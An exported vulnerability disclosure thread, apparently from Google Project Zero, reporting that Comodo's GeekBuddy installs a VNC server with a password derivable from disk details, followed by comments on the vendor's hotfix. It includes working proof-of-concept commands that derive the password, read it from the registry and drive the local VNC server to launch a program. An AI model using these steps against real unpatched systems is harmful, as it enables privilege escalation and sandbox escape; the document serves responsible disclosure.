ArashAll / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Comodo: Comodo Internet Security installs and starts a VNC server by default #703

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago
When you install Comodo Internet Security, in the default configuration an 
application called "GeekBuddy" is also installed and added to 
HKLM\System\CurrentControlSet\Services. GeekBuddy is a tech support 
application, that uses a number of questionable and shady tactics to encourage 
users to pay for online tech support.

https://www.comodo.com/home/support-maintenance/geekbuddy.php

As has been noted by numerous people over the last few years, GeekBuddy also 
installs a VNC server and enables it by default.

e.g.

https://forums.comodo.com/geekbuddy-live-pc-support/geekbuddy-tightvnc-http-port
-opened-default-on-5800-without-request-vulnerable-t111103.0.html
https://packetstormsecurity.com/files/131963/Comodo-GeekBuddy-Local-Privilege-Es
calation.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7872

This is an obvious and ridiculous local privilege escalation, which apparently 
Comodo believe they have resolved by generating a password instead of leaving 
it blank. That is not the case, as the password is simply the first 8 
characters of 
SHA1(Disk.Caption+Disk.Signature+Disk.SerialNumber+Disk.TotalTracks). I imagine 
Comodo thought nobody would bother checking how they generated the password, 
because this clearly doesn't prevent the attack they claim it solved.

Not to mention that this is also a sandbox escape that even works against 
Comodo and Chromodo sandboxes, not to mention Chrome, Protected Mode, and other 
sandboxes.

This information is available to unprivileged users, for example, an 
unprivileged user can launch calc.exe like this:

$ wmic diskdrive get Caption,Signature,SerialNumber,TotalTracks
Caption                                    SerialNumber  Signature   TotalTracks
VMware, VMware Virtual S SCSI Disk Device                -135723213  1997160

$ printf VMware,VMwareVirtualSSCSIDiskDevice-13572321319971601997160 | sha1sum 
| cut -c-8
7d4612e5

$ printf "key ctrl-esc\ntype calc.exe\nkey enter\n" | vncdotool -p 7d4612e5 -s 
localhost::5901 -

I'm using vncdotool from here:

https://github.com/sibson/vncdotool

(Note: if there is no SerialNumber field, TotalTracks needs to be repeated 
twice, I think this is a bug)

Or alternatively you can pull the password out of HKLM, just truncate it to 8 
characters(!!!):

$ reg query HKLM\\System\\Software\\COMODO\\CLPS\ 4\\CA /v osInstanceId
HKEY_LOCAL_MACHINE\System\Software\COMODO\CLPS 4\CA
    osInstanceId    REG_SZ    7d4612e59b27e4f19fc3d8e3491fb3bb879b18f3

Screenshot attached for reference.

It feels like there might be a way to make this remote, perhaps via 
dns-rebinding and websockets.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by tav...@google.com on 20 Jan 2016 at 12:06

Attachments:

GoogleCodeExporter commented 8 years ago
Update today:

Hello Tavis,

Regarding the vulnerability below, we have issued a hotfix on 10th of February. 

GB  4.25.380415.167 has the required fix and 90+% of existing users are updated 
as of now.

Original comment by tav...@google.com on 18 Feb 2016 at 8:29

GoogleCodeExporter commented 8 years ago
Wow, so that's what you meant on Twitter.

That's shady and horribly disappointing. If there was ever a reason to 
uninstall Comodo, this was it.

Thanks for everything you and Project Zero does. :)

Original comment by kobrasre...@gmail.com on 19 Feb 2016 at 5:30

GoogleCodeExporter commented 8 years ago
comment from Comodo

https://blog.comodo.com/comodo-news/10747/

Original comment by milosz.c...@gmail.com on 20 Feb 2016 at 12:43

GoogleCodeExporter commented 8 years ago
Wow have you read the spin Comodo put on this? "ITS NOT REMOTELY EXPLOITABLE" 
they claim, completely dismissing responsibility for what is a serious 
privilege escalation vulnerability.

Original comment by tobias.o...@gmail.com on 21 Feb 2016 at 11:01

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
This transcends a simple bug and vulnerability, it is a backdoor.

Original comment by Jus...@hollebconsulting.com on 22 Feb 2016 at 10:00

GoogleCodeExporter commented 8 years ago
@tobias, indeed, it's also written after the fact, as though the current state 
is how it was before. 

You can't issue a patch, then claim there wasn't a problem by describing how 
the software works post-patch.

Original comment by daniel.j...@gmail.com on 26 Feb 2016 at 3:21